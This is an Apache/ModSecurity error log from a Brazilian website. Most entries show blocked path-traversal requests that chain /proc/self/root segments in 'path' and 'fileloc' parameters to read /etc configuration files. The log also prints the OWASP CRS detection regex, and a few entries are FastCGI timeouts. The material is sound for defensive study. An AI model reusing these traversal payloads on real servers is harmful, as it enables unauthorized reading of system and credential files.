[Tue Mar 17 14:46:25.129890 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56130] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:46:47.249816 2026] [proxy_fcgi:error] [pid 17965:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56592] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:47:09.138038 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57016] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:47:10.247686 2026] [:error] [pid 6296:tid 140411632822016] [client 74.7.241.31:58358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTnnIk7brgkOH-rIWO1AAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:11.961764 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:58012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTn9Y0UrI5A3LftIz_owAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:13.467547 2026] [:error] [pid 7004:tid 140411557287680] [client 74.7.241.31:58028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTocU6Sx0TG1YjmQiyYwAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:14.854384 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:58038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTohj0p0SRWAqcjGF9EAAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:15.153773 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:58038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmToxj0p0SRWAqcjGF9EQAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:16.435279 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:58040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTpNY0UrI5A3LftIz_qAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:17.892544 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:53312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTpQeiSKl8TjouI-Yc2QAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:30.129842 2026] [proxy_fcgi:error] [pid 18380:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57514] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:47:31.463639 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.241.31:47594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTs_PqhzTj3BvfDX-LfAAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:32.972944 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.241.31:47600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTtPPqhzTj3BvfDX-LfQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:34.375713 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:47606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTtnIk7brgkOH-rIWO4wAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:35.823007 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:47618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTtweiSKl8TjouI-Yc7QAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:36.166478 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:47618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTuAeiSKl8TjouI-Yc7wAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:37.735341 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:58414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTudY0UrI5A3LftIz_swAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:39.106652 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.241.31:58422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTu_PqhzTj3BvfDX-LgAAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:51.069844 2026] [proxy_fcgi:error] [pid 9299:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57992] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:47:52.439889 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:49140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTyAeiSKl8TjouI-Yc9AAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:54.763173 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:49156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTygeiSKl8TjouI-Yc-QAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:55.278668 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.243.128:43326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTyxj0p0SRWAqcjGF9LwAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:47:56.285219 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.241.31:49170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTzKt8Nd0UC_OcbVHOgwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:57.773945 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.31:59232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTzaBJNF7axNlVR0UbswAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:47:59.247055 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:59238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmTz9Y0UrI5A3LftIz_ugAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:00.727063 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:59242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT0NY0UrI5A3LftIz_vQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
